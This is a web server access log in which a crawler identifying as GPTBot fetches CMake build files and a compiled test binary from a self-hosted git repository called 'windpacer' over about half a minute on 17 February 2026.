"/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29807] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11267] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11095] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14635] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14293] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10409] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:14:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:14:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10173] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39738] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14307] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10070] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10018] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20381] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16043] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14301] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12006] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16399] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16915] [Gzip 10.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51200] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 